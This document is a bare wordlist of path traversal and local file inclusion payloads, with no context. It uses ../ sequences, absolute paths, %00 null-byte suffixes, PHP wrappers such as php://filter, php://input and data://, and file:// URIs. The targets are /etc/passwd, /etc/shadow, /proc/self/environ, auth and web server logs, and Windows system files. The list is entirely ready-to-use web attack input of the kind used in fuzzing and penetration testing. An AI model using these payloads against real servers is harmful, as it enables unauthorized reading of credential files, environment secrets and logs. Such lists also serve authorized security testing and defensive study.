../../../../etc/passwd
../../../../etc/shadow
../../../../etc/group
../../../../proc/self/environ
../../../../var/log/auth.log
../../../../var/log/apache2/access.log
../../../../var/log/httpd/access.log
../../../../windows/win.ini
../../../../windows/system32/drivers/etc/hosts
../../../../boot.ini
/etc/passwd
/etc/shadow
/etc/group
/proc/self/environ
/var/log/auth.log
/var/log/apache2/access.log
/var/log/httpd/access.log
/windows/win.ini
/windows/system32/drivers/etc/hosts
/boot.ini
../../../../../../../etc/passwd
../../../../../../../etc/shadow
../../../../../../../etc/group
../../../../../../../proc/self/environ
../../../../../../../var/log/auth.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/httpd/access.log
../../../../../../../windows/win.ini
../../../../../../../windows/system32/drivers/etc/hosts
../../../../../../../boot.ini
/../../../../../../etc/passwd
/../../../../../../etc/shadow
/../../../../../../etc/group
/../../../../../../proc/self/environ
/../../../../../../var/log/auth.log
/../../../../../../var/log/apache2/access.log
/../../../../../../var/log/httpd/access.log
/../../../../../../windows/win.ini
/../../../../../../windows/system32/drivers/etc/hosts
/../../../../../../boot.ini
../../../../../etc/passwd%00
../../../../../etc/shadow%00
../../../../../etc/group%00
../../../../../proc/self/environ%00
../../../../../var/log/auth.log%00
../../../../../var/log/apache2/access.log%00
../../../../../var/log/httpd/access.log%00
../../../../../windows/win.ini%00
../../../../../windows/system32/drivers/etc/hosts%00
../../../../../boot.ini%00
../../../../../../../../etc/passwd%00
../../../../../../../../etc/shadow%00
../../../../../../../../etc/group%00
../../../../../../../../proc/self/environ%00
../../../../../../../../var/log/auth.log%00
../../../../../../../../var/log/apache2/access.log%00
../../../../../../../../var/log/httpd/access.log%00
../../../../../../../../windows/win.ini%00
../../../../../../../../windows/system32/drivers/etc/hosts%00
../../../../../../../../boot.ini%00
/etc/passwd%00
/etc/shadow%00
/etc/group%00
/proc/self/environ%00
/var/log/auth.log%00
/var/log/apache2/access.log%00
/var/log/httpd/access.log%00
/windows/win.ini%00
/windows/system32/drivers/etc/hosts%00
/boot.ini%00
/../../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../../etc/shadow
/../../../../../../../../../../../../etc/group
/../../../../../../../../../../../../proc/self/environ
/../../../../../../../../../../../../var/log/auth.log
/../../../../../../../../../../../../var/log/apache2/access.log
/../../../../../../../../../../../../var/log/httpd/access.log
/../../../../../../../../../../../../windows/win.ini
/../../../../../../../../../../../../windows/system32/drivers/etc/hosts
/../../../../../../../../../../../../boot.ini
php://filter/convert.base64-encode/resource=index.php
php://input
php://filter/read=string.rot13/resource=index.php
data://text/plain;base64,
file:///etc/passwd
file:///etc/shadow
file:///etc/group
file:///proc/self/environ
file:///var/log/auth.log
file:///var/log/apache2/access.log
file:///var/log/httpd/access.log
file:///windows/win.ini
file:///windows/system32/drivers/etc/hosts
file:///boot.ini
/../../../../../../../../../../../../etc/passwd%00
/../../../../../../../../../../../../etc/shadow%00
/../../../../../../../../../../../../etc/group%00
/../../../../../../../../../../../../proc/self/environ%00
/../../../../../../../../../../../../var/log/auth.log%00
/../../../../../../../../../../../../var/log/apache2/access.log%00